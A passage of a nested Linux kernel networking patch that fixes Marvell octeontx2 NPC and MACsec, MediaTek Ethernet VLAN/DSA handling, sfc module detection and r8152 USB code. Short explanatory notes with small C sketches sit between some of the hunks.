++	table->mem_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
++	table->cam_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 
+ 	dev_dbg(rvu->dev, "%s: NPC exact match 4way_2k table(ways=%d, depth=%d)\n",
+ 		__func__,  table->mem_table.ways, table->cam_table.depth);
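The last hunk swaps two FIELD_GET() extractions so that the memory-table depth comes from bits 15:0 and the CAM depth from bits 31:24 of the const3 register, with ways staying in 19:16. A standalone sketch of that style of decoding, reimplementing GENMASK_ULL()/FIELD_GET() for userspace; the register value is invented:

#include <stdint.h>
#include <stdio.h>

#define GENMASK_ULL(h, l) \
	((~0ULL << (l)) & (~0ULL >> (63 - (h))))

/* shift the masked field down by the mask's lowest set bit */
#define FIELD_GET_ULL(mask, val) \
	(((val) & (mask)) >> __builtin_ctzll(mask))

int main(void)
{
	uint64_t npc_const3 = 0x20040800ULL;	/* hypothetical register value */

	printf("mem depth = %llu\n",	/* -> 2048 */
	       (unsigned long long)FIELD_GET_ULL(GENMASK_ULL(15, 0), npc_const3));
	printf("ways      = %llu\n",	/* -> 4 */
	       (unsigned long long)FIELD_GET_ULL(GENMASK_ULL(19, 16), npc_const3));
	printf("cam depth = %llu\n",	/* -> 32 */
	       (unsigned long long)FIELD_GET_ULL(GENMASK_ULL(31, 24), npc_const3));
	return 0;
}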
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+index 3efeb09c58dec..a1c3d987b8044 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+@@ -31,6 +31,12 @@
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx), cfg)
+ 
++#define GET_KEX_LD_HASH_CTRL(intf, ld)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld))
++
++#define GET_KEX_LD_HASH_MASK(intf, ld, mask_idx)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx))
++
+ #define SET_KEX_LD_HASH_CTRL(intf, ld, cfg) \
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld), cfg)
+@@ -56,8 +62,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask);
+ void npc_config_secret_key(struct rvu *rvu, int blkaddr);
+ void npc_program_mkex_hash(struct rvu *rvu, int blkaddr);
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx);
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx);
+ 
+ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	.lid_lt_ld_hash_en = {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+index 9ec5f38d38a84..a487a98eac88c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+@@ -9,6 +9,7 @@
+ #include <net/macsec.h>
+ #include "otx2_common.h"
+ 
++#define MCS_TCAM0_MAC_DA_MASK		GENMASK_ULL(47, 0)
+ #define MCS_TCAM0_MAC_SA_MASK		GENMASK_ULL(63, 48)
+ #define MCS_TCAM1_MAC_SA_MASK		GENMASK_ULL(31, 0)
+ #define MCS_TCAM1_ETYPE_MASK		GENMASK_ULL(47, 32)
+@@ -149,11 +150,20 @@ static void cn10k_mcs_free_rsrc(struct otx2_nic *pfvf, enum mcs_direction dir,
+ 				enum mcs_rsrc_type type, u16 hw_rsrc_id,
+ 				bool all)
+ {
++	struct mcs_clear_stats *clear_req;
+ 	struct mbox *mbox = &pfvf->mbox;
+ 	struct mcs_free_rsrc_req *req;
+ 
+ 	mutex_lock(&mbox->lock);
+ 
++	clear_req = otx2_mbox_alloc_msg_mcs_clear_stats(mbox);
++	if (!clear_req)
++		goto fail;
++
++	clear_req->id = hw_rsrc_id;
++	clear_req->type = type;
++	clear_req->dir = dir;
++
+ 	req = otx2_mbox_alloc_msg_mcs_free_resources(mbox);
+ 	if (!req)
+ 		goto fail;
+@@ -237,8 +247,10 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 				     struct cn10k_mcs_rxsc *rxsc, u8 hw_secy_id)
+ {
+ 	struct macsec_rx_sc *sw_rx_sc = rxsc->sw_rxsc;
++	struct macsec_secy *secy = rxsc->sw_secy;
+ 	struct mcs_flowid_entry_write_req *req;
+ 	struct mbox *mbox = &pfvf->mbox;
++	u64 mac_da;
+ 	int ret;
+ 
+ 	mutex_lock(&mbox->lock);
+@@ -249,11 +261,16 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 		goto fail;
+ 	}
+ 
++	mac_da = ether_addr_to_u64(secy->netdev->dev_addr);
++
++	req->data[0] = FIELD_PREP(MCS_TCAM0_MAC_DA_MASK, mac_da);
++	req->mask[0] = ~0ULL;
++	req->mask[0] = ~MCS_TCAM0_MAC_DA_MASK;
++
+ 	req->data[1] = FIELD_PREP(MCS_TCAM1_ETYPE_MASK, ETH_P_MACSEC);
+ 	req->mask[1] = ~0ULL;
+ 	req->mask[1] &= ~MCS_TCAM1_ETYPE_MASK;
+ 
+-	req->mask[0] = ~0ULL;
+ 	req->mask[2] = ~0ULL;
+ 	req->mask[3] = ~0ULL;
+ 
+@@ -997,7 +1014,7 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 
+ 	/* Check if sync is really needed */
+ 	if (secy->validate_frames == txsc->last_validate_frames &&
+-	    secy->protect_frames == txsc->last_protect_frames)
++	    secy->replay_protect == txsc->last_replay_protect)
+ 		return;
+ 
+ 	cn10k_mcs_secy_stats(pfvf, txsc->hw_secy_id_rx, &rx_rsp, MCS_RX, true);
+@@ -1019,19 +1036,19 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 		rxsc->stats.InPktsInvalid += sc_rsp.pkt_invalid_cnt;
+ 		rxsc->stats.InPktsNotValid += sc_rsp.pkt_notvalid_cnt;
+ 
+-		if (txsc->last_protect_frames)
++		if (txsc->last_replay_protect)
+ 			rxsc->stats.InPktsLate += sc_rsp.pkt_late_cnt;
+ 		else
+ 			rxsc->stats.InPktsDelayed += sc_rsp.pkt_late_cnt;
+ 
+-		if (txsc->last_validate_frames == MACSEC_VALIDATE_CHECK)
++		if (txsc->last_validate_frames == MACSEC_VALIDATE_DISABLED)
+ 			rxsc->stats.InPktsUnchecked += sc_rsp.pkt_unchecked_cnt;
+ 		else
+ 			rxsc->stats.InPktsOK += sc_rsp.pkt_unchecked_cnt;
+ 	}
+ 
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ }
+ 
+ static int cn10k_mdo_open(struct macsec_context *ctx)
+@@ -1100,7 +1117,7 @@ static int cn10k_mdo_add_secy(struct macsec_context *ctx)
+ 	txsc->sw_secy = secy;
+ 	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ 
+ 	list_add(&txsc->entry, &cfg->txsc_list);
+ 
+@@ -1117,6 +1134,7 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	struct macsec_secy *secy = ctx->secy;
+ 	struct macsec_tx_sa *sw_tx_sa;
+ 	struct cn10k_mcs_txsc *txsc;
++	bool active;
+ 	u8 sa_num;
+ 	int err;
+ 
+@@ -1124,15 +1142,19 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	if (!txsc)
+ 		return -ENOENT;
+ 
+-	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+-
+-	sa_num = txsc->encoding_sa;
+-	sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++	/* Encoding SA got changed */
++	if (txsc->encoding_sa != secy->tx_sc.encoding_sa) {
++		txsc->encoding_sa = secy->tx_sc.encoding_sa;
++		sa_num = txsc->encoding_sa;
++		sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++		active = sw_tx_sa ? sw_tx_sa->active : false;
++		cn10k_mcs_link_tx_sa2sc(pfvf, secy, txsc, sa_num, active);
++	}
+ 
+ 	if (netif_running(secy->netdev)) {
+ 		cn10k_mcs_sync_stats(pfvf, secy, txsc);
+ 
+-		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, sw_tx_sa, sa_num);
++		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, NULL, 0);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -1521,12 +1543,12 @@ static int cn10k_mdo_get_rx_sc_stats(struct macsec_context *ctx)
+ 	rxsc->stats.InPktsInvalid += rsp.pkt_invalid_cnt;
+ 	rxsc->stats.InPktsNotValid += rsp.pkt_notvalid_cnt;
+ 
+-	if (secy->protect_frames)
++	if (secy->replay_protect)
+ 		rxsc->stats.InPktsLate += rsp.pkt_late_cnt;
+ 	else
+ 		rxsc->stats.InPktsDelayed += rsp.pkt_late_cnt;
+ 
+-	if (secy->validate_frames == MACSEC_VALIDATE_CHECK)
++	if (secy->validate_frames == MACSEC_VALIDATE_DISABLED)
+ 		rxsc->stats.InPktsUnchecked += rsp.pkt_unchecked_cnt;
+ 	else
+ 		rxsc->stats.InPktsOK += rsp.pkt_unchecked_cnt;
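The flow-id hunk earlier in this file builds the new TCAM key: data[0] carries the secy netdev's destination MAC in bits 47:0, and clearing those bits in mask[0] makes them significant, on the apparent convention that a set mask bit means don't-care (the ethertype in data[1]/mask[1] follows the same pattern). A userspace sketch of that construction; ether_to_u64() is a local stand-in for ether_addr_to_u64() and the address is invented:

#include <stdint.h>
#include <stdio.h>

#define GENMASK_ULL(h, l) \
	((~0ULL << (l)) & (~0ULL >> (63 - (h))))
#define MAC_DA_MASK	GENMASK_ULL(47, 0)

static uint64_t ether_to_u64(const uint8_t *a)
{
	uint64_t v = 0;
	int i;

	for (i = 0; i < 6; i++)		/* a[0] ends up most significant */
		v = (v << 8) | a[i];
	return v;
}

int main(void)
{
	const uint8_t dev_addr[6] = { 0x02, 0x00, 0x00, 0xaa, 0xbb, 0xcc };
	uint64_t data0 = ether_to_u64(dev_addr) & MAC_DA_MASK;
	uint64_t mask0 = ~MAC_DA_MASK;	/* compare only the DA bits */

	printf("data[0]=%#llx mask[0]=%#llx\n",
	       (unsigned long long)data0, (unsigned long long)mask0);
	return 0;
}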
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 3d22cc6a2804a..0c8fc66ade82d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -335,11 +335,11 @@ struct otx2_flow_config {
+ #define OTX2_PER_VF_VLAN_FLOWS	2 /* Rx + Tx per VF */
+ #define OTX2_VF_VLAN_RX_INDEX	0
+ #define OTX2_VF_VLAN_TX_INDEX	1
+-	u16			max_flows;
+-	u8			dmacflt_max_flows;
+ 	u32			*bmap_to_dmacindex;
+ 	unsigned long		*dmacflt_bmap;
+ 	struct list_head	flow_list;
++	u32			dmacflt_max_flows;
++	u16                     max_flows;
+ };
+ 
+ struct otx2_tc_info {
+@@ -389,7 +389,7 @@ struct cn10k_mcs_txsc {
+ 	struct cn10k_txsc_stats stats;
+ 	struct list_head entry;
+ 	enum macsec_validation_type last_validate_frames;
+-	bool last_protect_frames;
++	bool last_replay_protect;
+ 	u16 hw_secy_id_tx;
+ 	u16 hw_secy_id_rx;
+ 	u16 hw_flow_id;
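Besides widening dmacflt_max_flows from u8 to u32, the otx2_flow_config hunk moves the two narrow members after the pointer-sized ones, which turns a five-byte interior hole into plain tail padding. A quick demonstration with reduced stand-in structs (not the real layout), assuming a 64-bit ABI:

#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

struct before {
	uint16_t max_flows;
	uint8_t dmacflt_max_flows;
	uint32_t *bmap;		/* interior hole before this member */
	void *list;
};

struct after {
	uint32_t *bmap;
	void *list;
	uint32_t dmacflt_max_flows;
	uint16_t max_flows;	/* narrow fields grouped at the tail */
};

int main(void)
{
	/* fields end at byte 3, but bmap starts at 8: a 5-byte hole */
	printf("before: bmap at offset %zu, size %zu\n",
	       offsetof(struct before, bmap), sizeof(struct before));
	/* no interior hole; only tail padding remains */
	printf("after: max_flows at offset %zu, size %zu\n",
	       offsetof(struct after, max_flows), sizeof(struct after));
	return 0;
}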
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index c1ea60bc2630e..23eee2b3d4081 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1835,13 +1835,22 @@ int otx2_open(struct net_device *netdev)
+ 		otx2_dmacflt_reinstall_flows(pf);
+ 
+ 	err = otx2_rxtx_enable(pf, true);
+-	if (err)
++	/* If an mbox communication error happens at this point, the
++	 * interface will end up down while the hardware MCAM entries
++	 * remain enabled to receive packets. Hence disable packet
++	 * I/O.
++	 */
++	if (err == EIO)
++		goto err_disable_rxtx;
++	else if (err)
+ 		goto err_tx_stop_queues;
+ 
+ 	otx2_do_set_rx_mode(pf);
+ 
+ 	return 0;
+ 
++err_disable_rxtx:
++	otx2_rxtx_enable(pf, false);
+ err_tx_stop_queues:
+ 	netif_tx_stop_all_queues(netdev);
+ 	netif_carrier_off(netdev);
+@@ -3069,8 +3078,6 @@ static void otx2_remove(struct pci_dev *pdev)
+ 		otx2_config_pause_frm(pf);
+ 	}
+ 
+-	cn10k_mcs_free(pf);
+-
+ #ifdef CONFIG_DCB
+ 	/* Disable PFC config */
+ 	if (pf->pfc_en) {
+@@ -3084,6 +3091,7 @@ static void otx2_remove(struct pci_dev *pdev)
+ 
+ 	otx2_unregister_dl(pf);
+ 	unregister_netdev(netdev);
++	cn10k_mcs_free(pf);
+ 	otx2_sriov_disable(pf->pdev);
+ 	otx2_sriov_vfcfg_cleanup(pf);
+ 	if (pf->otx2_wq)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+index 044cc211424ed..8392f63e433fc 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+@@ -544,7 +544,7 @@ static int otx2_tc_prepare_flow(struct otx2_nic *nic, struct otx2_tc_flow *node,
+ 		if (match.mask->flags & FLOW_DIS_IS_FRAGMENT) {
+ 			if (ntohs(flow_spec->etype) == ETH_P_IP) {
+ 				flow_spec->ip_flag = IPV4_FLAG_MORE;
+-				flow_mask->ip_flag = 0xff;
++				flow_mask->ip_flag = IPV4_FLAG_MORE;
+ 				req->features |= BIT_ULL(NPC_IPFRAG_IPV4);
+ 			} else if (ntohs(flow_spec->etype) == ETH_P_IPV6) {
+ 				flow_spec->next_header = IPPROTO_FRAGMENT;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+index ab126f8706c74..53366dbfbf27c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_vf.c
+@@ -621,7 +621,7 @@ static int otx2vf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 
+ 	err = otx2vf_realloc_msix_vectors(vf);
+ 	if (err)
+-		goto err_mbox_destroy;
++		goto err_detach_rsrc;
+ 
+ 	err = otx2_set_real_num_queues(netdev, qcount, qcount);
+ 	if (err)
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.c b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+index f56d4e7d4ae5d..4671d738a37c7 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.c
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.c
+@@ -1870,9 +1870,7 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 
+ 	while (done < budget) {
+ 		unsigned int pktlen, *rxdcsum;
+-		bool has_hwaccel_tag = false;
+ 		struct net_device *netdev;
+-		u16 vlan_proto, vlan_tci;
+ 		dma_addr_t dma_addr;
+ 		u32 hash, reason;
+ 		int mac = 0;
+@@ -2007,31 +2005,16 @@ static int mtk_poll_rx(struct napi_struct *napi, int budget,
+ 			skb_checksum_none_assert(skb);
+ 		skb->protocol = eth_type_trans(skb, netdev);
+ 
+-		if (netdev->features & NETIF_F_HW_VLAN_CTAG_RX) {
+-			if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+-				if (trxd.rxd3 & RX_DMA_VTAG_V2) {
+-					vlan_proto = RX_DMA_VPID(trxd.rxd4);
+-					vlan_tci = RX_DMA_VID(trxd.rxd4);
+-					has_hwaccel_tag = true;
+-				}
+-			} else if (trxd.rxd2 & RX_DMA_VTAG) {
+-				vlan_proto = RX_DMA_VPID(trxd.rxd3);
+-				vlan_tci = RX_DMA_VID(trxd.rxd3);
+-				has_hwaccel_tag = true;
+-			}
+-		}
+-
+ 		/* When using VLAN untagging in combination with DSA, the
+ 		 * hardware treats the MTK special tag as a VLAN and untags it.
+ 		 */
+-		if (has_hwaccel_tag && netdev_uses_dsa(netdev)) {
+-			unsigned int port = vlan_proto & GENMASK(2, 0);
++		if (!MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2) &&
++		    (trxd.rxd2 & RX_DMA_VTAG) && netdev_uses_dsa(netdev)) {
++			unsigned int port = RX_DMA_VPID(trxd.rxd3) & GENMASK(2, 0);
+ 
+ 			if (port < ARRAY_SIZE(eth->dsa_meta) &&
+ 			    eth->dsa_meta[port])
+ 				skb_dst_set_noref(skb, &eth->dsa_meta[port]->dst);
+-		} else if (has_hwaccel_tag) {
+-			__vlan_hwaccel_put_tag(skb, htons(vlan_proto), vlan_tci);
+ 		}
+ 
+ 		if (reason == MTK_PPE_CPU_REASON_HIT_UNBIND_RATE_REACHED)
+@@ -2859,29 +2842,11 @@ static netdev_features_t mtk_fix_features(struct net_device *dev,
+ 
+ static int mtk_set_features(struct net_device *dev, netdev_features_t features)
+ {
+-	struct mtk_mac *mac = netdev_priv(dev);
+-	struct mtk_eth *eth = mac->hw;
+ 	netdev_features_t diff = dev->features ^ features;
+-	int i;
+ 
+ 	if ((diff & NETIF_F_LRO) && !(features & NETIF_F_LRO))
+ 		mtk_hwlro_netdev_disable(dev);
+ 
+-	/* Set RX VLAN offloading */
+-	if (!(diff & NETIF_F_HW_VLAN_CTAG_RX))
+-		return 0;
+-
+-	mtk_w32(eth, !!(features & NETIF_F_HW_VLAN_CTAG_RX),
+-		MTK_CDMP_EG_CTRL);
+-
+-	/* sync features with other MAC */
+-	for (i = 0; i < MTK_MAC_COUNT; i++) {
+-		if (!eth->netdev[i] || eth->netdev[i] == dev)
+-			continue;
+-		eth->netdev[i]->features &= ~NETIF_F_HW_VLAN_CTAG_RX;
+-		eth->netdev[i]->features |= features & NETIF_F_HW_VLAN_CTAG_RX;
+-	}
+-
+ 	return 0;
+ }
+ 
+@@ -3184,30 +3149,6 @@ static int mtk_open(struct net_device *dev)
+ 	struct mtk_eth *eth = mac->hw;
+ 	int i, err;
+ 
+-	if (mtk_uses_dsa(dev) && !eth->prog) {
+-		for (i = 0; i < ARRAY_SIZE(eth->dsa_meta); i++) {
+-			struct metadata_dst *md_dst = eth->dsa_meta[i];
+-
+-			if (md_dst)
+-				continue;
+-
+-			md_dst = metadata_dst_alloc(0, METADATA_HW_PORT_MUX,
+-						    GFP_KERNEL);
+-			if (!md_dst)
+-				return -ENOMEM;
+-
+-			md_dst->u.port_info.port_id = i;
+-			eth->dsa_meta[i] = md_dst;
+-		}
+-	} else {
+-		/* Hardware special tag parsing needs to be disabled if at least
+-		 * one MAC does not use DSA.
+-		 */
+-		u32 val = mtk_r32(eth, MTK_CDMP_IG_CTRL);
+-		val &= ~MTK_CDMP_STAG_EN;
+-		mtk_w32(eth, val, MTK_CDMP_IG_CTRL);
+-	}
+-
+ 	err = phylink_of_phy_connect(mac->phylink, mac->of_node, 0);
+ 	if (err) {
+ 		netdev_err(dev, "%s: could not attach PHY: %d\n", __func__,
+@@ -3246,6 +3187,40 @@ static int mtk_open(struct net_device *dev)
+ 	phylink_start(mac->phylink);
+ 	netif_tx_start_all_queues(dev);
+ 
++	if (MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2))
++		return 0;
++
++	if (mtk_uses_dsa(dev) && !eth->prog) {
++		for (i = 0; i < ARRAY_SIZE(eth->dsa_meta); i++) {
++			struct metadata_dst *md_dst = eth->dsa_meta[i];
++
++			if (md_dst)
++				continue;
++
++			md_dst = metadata_dst_alloc(0, METADATA_HW_PORT_MUX,
++						    GFP_KERNEL);
++			if (!md_dst)
++				return -ENOMEM;
++
++			md_dst->u.port_info.port_id = i;
++			eth->dsa_meta[i] = md_dst;
++		}
++	} else {
++		/* Hardware special tag parsing needs to be disabled if at least
++		 * one MAC does not use DSA.
++		 */
++		u32 val = mtk_r32(eth, MTK_CDMP_IG_CTRL);
++
++		val &= ~MTK_CDMP_STAG_EN;
++		mtk_w32(eth, val, MTK_CDMP_IG_CTRL);
++
++		val = mtk_r32(eth, MTK_CDMQ_IG_CTRL);
++		val &= ~MTK_CDMQ_STAG_EN;
++		mtk_w32(eth, val, MTK_CDMQ_IG_CTRL);
++
++		mtk_w32(eth, 0, MTK_CDMP_EG_CTRL);
++	}
++
+ 	return 0;
+ }
+ 
+@@ -3572,10 +3547,9 @@ static int mtk_hw_init(struct mtk_eth *eth)
+ 	if (!MTK_HAS_CAPS(eth->soc->caps, MTK_NETSYS_V2)) {
+ 		val = mtk_r32(eth, MTK_CDMP_IG_CTRL);
+ 		mtk_w32(eth, val | MTK_CDMP_STAG_EN, MTK_CDMP_IG_CTRL);
+-	}
+ 
+-	/* Enable RX VLan Offloading */
+-	mtk_w32(eth, 1, MTK_CDMP_EG_CTRL);
++		mtk_w32(eth, 1, MTK_CDMP_EG_CTRL);
++	}
+ 
+ 	/* set interrupt delays based on current Net DIM sample */
+ 	mtk_dim_rx(&eth->rx_dim.work);
+@@ -4176,7 +4150,7 @@ static int mtk_add_mac(struct mtk_eth *eth, struct device_node *np)
+ 		eth->netdev[id]->hw_features |= NETIF_F_LRO;
+ 
+ 	eth->netdev[id]->vlan_features = eth->soc->hw_features &
+-		~(NETIF_F_HW_VLAN_CTAG_TX | NETIF_F_HW_VLAN_CTAG_RX);
++		~NETIF_F_HW_VLAN_CTAG_TX;
+ 	eth->netdev[id]->features |= eth->soc->hw_features;
+ 	eth->netdev[id]->ethtool_ops = &mtk_ethtool_ops;
+ 
+diff --git a/drivers/net/ethernet/mediatek/mtk_eth_soc.h b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+index d4b4f9eaa4419..79112bd3e952e 100644
+--- a/drivers/net/ethernet/mediatek/mtk_eth_soc.h
++++ b/drivers/net/ethernet/mediatek/mtk_eth_soc.h
+@@ -48,7 +48,6 @@
+ #define MTK_HW_FEATURES		(NETIF_F_IP_CSUM | \
+ 				 NETIF_F_RXCSUM | \
+ 				 NETIF_F_HW_VLAN_CTAG_TX | \
+-				 NETIF_F_HW_VLAN_CTAG_RX | \
+ 				 NETIF_F_SG | NETIF_F_TSO | \
+ 				 NETIF_F_TSO6 | \
+ 				 NETIF_F_IPV6_CSUM |\
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+index e6ff757895abb..4ec66a6be0738 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_devlink.c
+@@ -61,6 +61,8 @@ struct ionic *ionic_devlink_alloc(struct device *dev)
+ 	struct devlink *dl;
+ 
+ 	dl = devlink_alloc(&ionic_dl_ops, sizeof(struct ionic), dev);
++	if (!dl)
++		return NULL;
+ 
+ 	return devlink_priv(dl);
+ }
+diff --git a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+index 01c22701482d9..d7370fb60a168 100644
+--- a/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
++++ b/drivers/net/ethernet/pensando/ionic/ionic_ethtool.c
+@@ -691,7 +691,7 @@ static int ionic_get_rxnfc(struct net_device *netdev,
+ 		info->data = lif->nxqs;
+ 		break;
+ 	default:
+-		netdev_err(netdev, "Command parameter %d is not supported\n",
++		netdev_dbg(netdev, "Command parameter %d is not supported\n",
+ 			   info->cmd);
+ 		err = -EOPNOTSUPP;
+ 	}
+diff --git a/drivers/net/ethernet/sfc/mcdi_port_common.c b/drivers/net/ethernet/sfc/mcdi_port_common.c
+index 899cc16710048..0ab14f3d01d4d 100644
+--- a/drivers/net/ethernet/sfc/mcdi_port_common.c
++++ b/drivers/net/ethernet/sfc/mcdi_port_common.c
+@@ -972,12 +972,15 @@ static u32 efx_mcdi_phy_module_type(struct efx_nic *efx)
+ 
+ 	/* A QSFP+ NIC may actually have an SFP+ module attached.
+ 	 * The ID is page 0, byte 0.
++	 * QSFP28 is of type SFF_8636, however, this is treated
++	 * the same by ethtool, so we can also treat them the same.
+ 	 */
+ 	switch (efx_mcdi_phy_get_module_eeprom_byte(efx, 0, 0)) {
+-	case 0x3:
++	case 0x3: /* SFP */
+ 		return MC_CMD_MEDIA_SFP_PLUS;
+-	case 0xc:
+-	case 0xd:
++	case 0xc: /* QSFP */
++	case 0xd: /* QSFP+ */
++	case 0x11: /* QSFP28 */
+ 		return MC_CMD_MEDIA_QSFP_PLUS;
+ 	default:
+ 		return 0;
+@@ -1075,7 +1078,7 @@ int efx_mcdi_phy_get_module_info(struct efx_nic *efx, struct ethtool_modinfo *mo
+ 
+ 	case MC_CMD_MEDIA_QSFP_PLUS:
+ 		modinfo->type = ETH_MODULE_SFF_8436;
+-		modinfo->eeprom_len = ETH_MODULE_SFF_8436_LEN;
++		modinfo->eeprom_len = ETH_MODULE_SFF_8436_MAX_LEN;
+ 		break;
+ 
+ 	default:
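Byte 0 of the module EEPROM is the SFF-8024 identifier, and the hunk above simply adds QSFP28 (0x11) to the identifiers reported as QSFP media, since ethtool treats them alike. A sketch of the mapping with local enums in place of the MC_CMD_* constants:

#include <stdio.h>

enum media { MEDIA_UNKNOWN, MEDIA_SFP_PLUS, MEDIA_QSFP_PLUS };

static enum media module_media(unsigned char id_byte)
{
	switch (id_byte) {
	case 0x3:	/* SFP */
		return MEDIA_SFP_PLUS;
	case 0xc:	/* QSFP */
	case 0xd:	/* QSFP+ */
	case 0x11:	/* QSFP28 */
		return MEDIA_QSFP_PLUS;
	default:
		return MEDIA_UNKNOWN;
	}
}

int main(void)
{
	printf("%d\n", module_media(0x11));	/* -> MEDIA_QSFP_PLUS */
	return 0;
}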
+diff --git a/drivers/net/usb/r8152.c b/drivers/net/usb/r8152.c
+index 23da1d9dafd1f..059d610901d84 100644
+--- a/drivers/net/usb/r8152.c
++++ b/drivers/net/usb/r8152.c
+@@ -199,6 +199,7 @@
+ #define OCP_EEE_AR		0xa41a
+ #define OCP_EEE_DATA		0xa41c
+ #define OCP_PHY_STATUS		0xa420
++#define OCP_INTR_EN		0xa424
+ #define OCP_NCTL_CFG		0xa42c
+ #define OCP_POWER_CFG		0xa430
+ #define OCP_EEE_CFG		0xa432
+@@ -620,6 +621,9 @@ enum spd_duplex {
+ #define PHY_STAT_LAN_ON		3
+ #define PHY_STAT_PWRDN		5
+ 
++/* OCP_INTR_EN */
++#define INTR_SPEED_FORCE	BIT(3)
++
+ /* OCP_NCTL_CFG */
+ #define PGA_RETURN_EN		BIT(1)
+ 
+@@ -3023,12 +3027,16 @@ static int rtl_enable(struct r8152 *tp)
+ 	ocp_write_byte(tp, MCU_TYPE_PLA, PLA_CR, ocp_data);
+ 
+ 	switch (tp->version) {
+-	case RTL_VER_08:
+-	case RTL_VER_09:
+-	case RTL_VER_14:
+-		r8153b_rx_agg_chg_indicate(tp);
++	case RTL_VER_01:
++	case RTL_VER_02:
++	case RTL_VER_03:
++	case RTL_VER_04:
++	case RTL_VER_05:
++	case RTL_VER_06:
++	case RTL_VER_07:
+ 		break;
+ 	default:
++		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 	}
+ 
+@@ -3082,7 +3090,6 @@ static void r8153_set_rx_early_timeout(struct r8152 *tp)
+ 			       640 / 8);
+ 		ocp_write_word(tp, MCU_TYPE_USB, USB_RX_EXTRA_AGGR_TMR,
+ 			       ocp_data);
+-		r8153b_rx_agg_chg_indicate(tp);
+ 		break;
+ 
+ 	default:
+@@ -3116,7 +3123,6 @@ static void r8153_set_rx_early_size(struct r8152 *tp)
+ 	case RTL_VER_15:
